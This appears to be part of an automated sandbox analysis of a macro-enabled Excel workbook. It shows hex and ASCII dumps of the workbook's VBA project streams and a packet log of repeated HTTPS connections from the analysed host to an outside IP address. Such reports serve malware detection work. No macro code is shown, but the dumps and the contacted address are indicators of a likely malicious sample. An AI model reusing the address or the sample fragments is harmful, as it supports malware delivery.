                                              Data Raw:49 44 3d 22 7b 43 34 35 33 35 36 41 32 2d 39 39 30 42 2d 34 30 38 36 2d 38 38 45 33 2d 39 39 45 36 30 38 39 37 41 39 38 42 7d 22 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d
                                              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 128
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                              CLSID:
                                              File Type:data
                                              Stream Size:128
                                              Entropy:3.225887155982128
                                              Base64 Encoded:False
                                              Data ASCII:M o d u l e 1 . M . o . d . u . l . e . 1 . . . T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                              Data Raw:4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4686
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                              CLSID:
                                              File Type:data
                                              Stream Size:4686
                                              Entropy:5.460951643302122
                                              Base64 Encoded:False
                                              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                              Data Raw:cc 61 94 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1648
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                              CLSID:
                                              File Type:data
                                              Stream Size:1648
                                              Entropy:4.486854279522573
                                              Base64 Encoded:False
                                              Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . _ S $ G . l U ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:93 4b 2a 94 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 01 00 02 00 01 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 213
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                              CLSID:
                                              File Type:data
                                              Stream Size:213
                                              Entropy:4.135793655107541
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . ~ } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . i . . . . . . . . . . . . . . . . . . . S . . . Z . . . . . . .
                                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 7d 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 09 00 00 00 00 00 05 00 ff ff ff ff ff ff ff ff ff ff ff ff 03 00 00 09 29 03 00 00 00 00 00 00 69 06 00 00 00 00 00 00 08 00 00 00 00 00 01 00 15 00 00 08 53 00 00 00 a6 ba bf a8 b8 ab
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 84
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                              CLSID:
                                              File Type:data
                                              Stream Size:84
                                              Entropy:1.9112050925821995
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . . . . . .
                                              Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 04 00 00 12 00 00 6b 00 00 7f 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 104
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                              CLSID:
                                              File Type:data
                                              Stream Size:104
                                              Entropy:1.8791610310005664
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . n . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 508
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_4
                                              CLSID:
                                              File Type:data
                                              Stream Size:508
                                              Entropy:2.284485644632113
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . + . 8 . . . i . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . ` . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 05 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 f1 05 00 00 00 00 00 00 19 06 00 00 00 00 00 00 41 06 00 00 00 00 00 00 ff ff ff ff c9 05 00 00 00 00 00 00 08 00 2b 00 38 00 00 00 69 06 00 00 00 00 00 00 61 00 00 00 00 00 01 00 91 06
                                              Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 422
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_5
                                              CLSID:
                                              File Type:data
                                              Stream Size:422
                                              Entropy:2.6944113916031895
                                              Base64 Encoded:False
                                              Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . $ . . . . . . . . . . . . ` . . 0 . . . . . . . . . . . . . ( . A . . . . . . . . . . ` . . . . . . . . . . . . . . % . ( . . . . . . . . . . . ` . . . . . . . . . . . . . . # . ( . . . . . . . . . . . ` . . . . . . . . . . . . . . + . ( . . . . . . . . . . . . ` . . ! . . . . . . . . . . . / . ( . A . . . . . . . . . . ` . . % . . . . . . . . . . . ( . ( . . . . . . . . . . . ` . . ) . . . . . . . . . . . / . 0 . . . . . . .
                                              Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff 00 00 00 00 44 00 00 00 04 00 24 00 01 01 00 00 00 00 04 00 00 00 03 60 00 00 30 04 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 00 28 00 41 01 00 00 00 00 04 00 01 00 03 60 04 01 15 04 ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff 00 00
                                              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 613
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                              CLSID:
                                              File Type:data
                                              Stream Size:613
                                              Entropy:6.408833595804487
                                              Base64 Encoded:True
                                              Data ASCII:. a . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . q p i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                              Data Raw:01 61 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 71 99 70 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 14, 2024 13:51:52.035856009 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:52.035917997 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:52.035974026 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:52.042916059 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:52.042937994 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:53.843456984 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:53.843662024 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:53.849812031 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:53.849831104 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:53.850416899 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:53.850474119 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:53.924396992 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:53.967341900 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:54.335606098 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:54.335654974 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:54.335686922 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:54.335745096 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:54.335799932 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:54.335799932 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:54.335799932 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:54.337136030 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:54.340190887 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:54.340204000 CET4434916187.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:54.340209961 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:54.340339899 CET49161443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:55.834732056 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:55.834795952 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:55.834861994 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:55.836162090 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:55.836174965 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.191937923 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.192003965 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.196748018 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.196758986 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.197108984 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.275952101 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.319344044 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.893975973 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.894020081 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.894028902 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.894045115 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.894052029 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.894054890 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.894547939 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.894597054 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.894618034 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.894659996 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.894720078 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.943953037 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.943969011 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.943994045 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.944032907 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.944072008 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.944088936 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.968702078 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.968805075 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.968910933 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969238997 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969238997 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969281912 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969305992 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:51:57.969324112 CET49162443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:51:57.969329119 CET4434916287.121.86.205192.168.2.22
                                              Dec 14, 2024 13:52:59.775387049 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:52:59.775435925 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:52:59.775495052 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:52:59.780349970 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:52:59.780368090 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.143707991 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.143785954 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.149328947 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.149334908 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.149672031 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.151335001 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.208811998 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.255348921 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847285986 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847348928 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847388983 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847402096 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.847425938 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847439051 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.847445011 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.847454071 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.847465038 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.847479105 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.851645947 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.900177956 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.900243998 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.900381088 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.900403023 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:01.900487900 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:01.900511026 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.046454906 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.046510935 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.046526909 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.046541929 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.046554089 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.046575069 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.046736002 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.075464964 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.075525045 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.075541973 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.075551033 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.075561047 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.075586081 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.075715065 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.108975887 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.109038115 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.109067917 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.109075069 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.109091997 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.109108925 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.109173059 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.231230021 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.231287003 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.231308937 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.231339931 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.231357098 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.231374025 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.231426954 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.255497932 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.255558014 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.255563974 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.255572081 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.255609989 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.255644083 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.279613018 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.279659033 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.279685020 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.279694080 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.279705048 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.279726028 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.279783964 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.295059919 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.295105934 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.295128107 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.295135975 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.295146942 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.295164108 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.295212984 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.309808016 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.309859991 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.309883118 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.309890985 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.309902906 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.309920073 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.309981108 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.324429989 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.324481010 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.324556112 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.324562073 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.324589014 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.324595928 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.324608088 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.432539940 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.432595015 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.432818890 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.432818890 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.432832003 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.432878971 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.433649063 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.447601080 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.447653055 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.447917938 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.447932959 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.448008060 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.448549986 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.457731009 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.457773924 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.457962990 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.457972050 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.458009958 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.458009958 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.458590984 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.469679117 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.469727993 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.469796896 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.469796896 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.469805956 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.469826937 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.469902039 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.480775118 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.480829954 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.480901003 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.480901003 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.480911970 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.480992079 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.481420040 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.492082119 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.492127895 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.492249966 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.492249966 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.492249966 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.492258072 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.492319107 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.503932953 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.503984928 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.504044056 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.504044056 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.504050970 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.504086018 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.504086018 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.514111996 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.514168978 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.514234066 CET49163443192.168.2.2287.121.86.205
                                              Dec 14, 2024 13:53:02.514240026 CET4434916387.121.86.205192.168.2.22
                                              Dec 14, 2024 13:53:02.514375925 CET49163443192.168.2.2287.121.86.205
